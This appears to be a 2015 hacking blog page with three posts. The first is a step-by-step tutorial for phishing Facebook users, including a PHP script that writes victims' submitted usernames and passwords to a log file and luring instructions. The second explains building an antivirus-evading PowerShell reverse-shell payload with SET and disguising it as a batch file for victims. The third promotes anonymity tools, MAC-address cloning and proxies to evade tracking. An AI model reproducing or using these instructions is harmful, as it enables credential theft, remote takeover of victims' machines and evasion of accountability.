субота, 8. август 2015.

FACEBOOK PHISHING TUTORIAL


So now, lets start with demonstration of phishing one of your favorite social networking website or emailing website.
There are many more, and this method will be apply to each and everyone like gmail.com, yahoo.com, live.com, hotmail.com, facebook.com, twitter.com, flicr, mail.com, rediffmail.com, in.com and rest of the Which websites provide these services.

So I am gonna demonstrate you on facebook.

Step-1: - Register to any free web hosting website. Some give website cpanel hosting, Which is Better for phishing, but however there are huge Which websites provide free hosting, Some of them are -





Register with those of above free web hosting and confirm this hosting. Once you done this, go to step-2.

Step-2: - Now gowww.facebook.com  and press Ctrl + U or right click on a web page and view source, now copy this all source code and paste it into the new notepad file

Step-3: - Now save this notepad file with name index.html on your desktop or a folder where you want.

Step-4: - Now open one more notepad file and copy the whole code below into it.


 <? php
header ("Location: http://www.facebook.com/ ');
$ Handler = fopen ("log.txt", "a");
foreach ($ _POST as $ variable => $ value) {
fwrite ($ handler, $ variable);
fwrite ($ handler, "=");
fwrite ($ handler, $ value);
fwrite ($ handler, "\ r \ n");
}
fwrite ($ handler, "\ r \ n");
fclose ($ handler);

exit;
?>

From <? Php it?>, Copy content to new notepad file and save it with any anyname.php, I am gonna save it with name login.php, you can anyname way that you want but ensur that extension should be. "Php". In the content there is a txt file (log.txt), any time you can name it txt Which is not guessable, I just pur log.txt but that you should name is unguessable and its extension may b. Txt or nothing.

Step-5: - Now, again open the index.html file into Notepad (I would like to recommended you to use Notepad + + for these kind of tasks, awesome and flexible text editor), and find (Ctrl + F for Find) keyword "action" here. You will see a keyword action = "https://www.face ****" something like this, remove this whole link Which is unde double quotes "" and thus here "login.php". Save it and exit (Ctrl + S for save).

Step-6: - Now upload index.html and login.php file to you file directory manager. If it is your cPanel account, upload files into file_manager -> public_html or if it is 000webhost.com account and upload index.html into login.php file manager as show in below image





 If you are logged into your account 000webhost.com, click on the "Go to Cpanel" in front of your domain that you had registered, and then go to "File Manager" under Files and log into it. Now click on the public_html. Now click on upload and upload your files both.

Step-7: - Now visit to your subdomain, like yourname.000webhost.com and you will see a phishing page of facebook.com. nowsend this link to a victim, say anything like join my network or any social engineering trick and force victim to visit you page and let him / her enter the username and password. Once he / she enter information, username and password will be save into the log.txt file and will redirect the victim's original facebook link facebook.com. Victim Will seems like he did enter wrong username and password so he should enter again, when he again will enter the info, he / she will successfully login into their facebook account. Game over!.

Step-8: - Now go to yourname.000webhost.com/log.txt and see the username and password of victim. Or you can visit again to your cpanel, here in File Manager> public_html and you will see the log.txt file, open it to view victim's username and password.



Read More ->>

Bypass AV USE PowerShell method using a batch file

Bypass AV USE PowerShell method using a batch file



  The penetration testing is the first step we can bypass the AV and make our FUD useful
We can get around this by using AV Veil.At that time we used python module.In veil there are four types paiload.C​​, C #, Python, and PowerShell. They now use PowerShell module.








cd / pentest / exploits / set /
./set


Then give your IP & Port to connect a reverse shell.



Now in the figures you can see that it has been generated & stored in the / root / .set / reports / powershell. And we also start metasploit listener.If victim paste our payload generated in cmd then we can get meterpreter shell. But i think it's hard to tell someone to copy & paste 
something into cmd. So we will create a batch file of our payload.


Create Batch File Of Our Payload




(1) open x86_powershell_injection.txt file from / root / .set / reports / powershell.
(2) Add path of powershell in first line. For example your code is starting from powershell word just put C: \ \ windows/system32/windowspowershell/v1.0 / before it.
(3) Copy all code from x86_powershell_injection.txt
(4) Create new file & paste code

(5) Save this file as. Extention bat and send to victim.

Read More ->>

how to stay anonymous on the Internet

In this tutorial I will show you how to be anonymous on the Internet

CyberGhost
Worried that Web sites are snooping on you as you surf? Concerned that when you're at a public Hot Spot, such as at a café, a hacker can intercept everything you send and receive - including passwords and other personal information? Then you should give CyberGhost VPN Free a try. It creates a virtual private network (VPN) connection when you're on the Internet.
CyberGhost Download




Tor browser
When you use a Tor client, your internet traffic is routed through Tor's network. The traffic travels through several randomly selected relays before exiting the Tor network and arriving at your destination. This prevents your Internet service provider and people monitoring your local network from viewing the websites you access. It also prevents the websites themselves from knowing your physical location or IP address - they'll see the IP address and location of the exit node instead. Even the relays do not know who requested the traffic they're passing along. All traffic within the Tor network is encrypted.

Tor browser Download



Hide your MAC
Hide your MAC Address from hackers, government agencies, your ISP, WiFi networks, online games, and more! Anyone with the right tools can track your Internet activity if they know your MAC Address. Public Wireless Access Points are all over, some less secure than others. Every time you open your laptop, it automatically attempts to contact to wireless networks, regardless if you use WEP / WPA Encryption. Fool MAC-based ACLs (Access Control Lists) by cloning the MAC address of a computer that is already authorized to use a WiFi network. Do not let your MAC Address to get out in the open, download Hide My MAC Address now.


Hide my MAC Download




Hide  IP 

Hide  IP Download



Send anonymous Email Click here

Create your anonymous email click here


The most common method to hide your IP address is to use a proxy server in one form or another. A proxy server is a computer that offers a computer network service

Mini list proxy 

http://www.hidemyass.com/proxy/
http://www.poproxy.eu/
http://facebookproxy.name/
http://www.firstproxy.net/
http://www.pro-proxy.net/
http://www.proxyhat.com/
http://anonymouse.org/
http://www.fakeip.org/

Go to the proxy paste the link to the page you want to visit

Read More ->>
Омогућава Blogger.